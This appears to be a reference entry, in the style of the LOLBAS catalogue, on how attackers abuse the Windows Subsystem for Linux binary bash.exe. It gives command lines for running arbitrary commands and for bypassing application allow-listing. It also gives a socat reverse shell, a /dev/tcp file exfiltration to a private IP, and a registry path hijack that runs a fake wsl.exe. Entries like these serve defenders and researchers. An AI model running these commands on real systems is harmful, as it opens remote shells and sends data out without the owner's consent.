.. /Bash.exe
Star

Execute (CMD)
AWL bypass (CMD)

File used by Windows subsystem for Linux

Paths:

Resources:

Acknowledgements:

Detections:

Execute

  1. Executes executable from bash.exe

    bash.exe -c "{CMD}"
    Use case

    Performs execution of specified file, can be used as a defensive evasion.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD

  2. Executes a reverse shell

    bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
    Use case

    Performs execution of specified file, can be used as a defensive evasion.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD

  3. Exfiltrate data

    bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
    Use case

    Performs execution of specified file, can be used as a defensive evasion.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD

  4. When executed, bash.exe queries the registry value of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation, which contains a folder path (c:\program files\wsl by default). If the value points to another folder containing a file named wsl.exe, it will be executed instead of the legitimate wsl.exe in the program files folder.

    bash.exe
    Use case

    Execute a payload as a child process of bash.exe while masquerading as WSL.

    Privileges required
    User
    Operating systems
    Windows 10, Windows Server 2019, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Execute: CMD

AWL bypass

  1. Executes executable from bash.exe

    bash.exe -c "{CMD}"
    Use case

    Performs execution of specified file, can be used to bypass Application Whitelisting.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD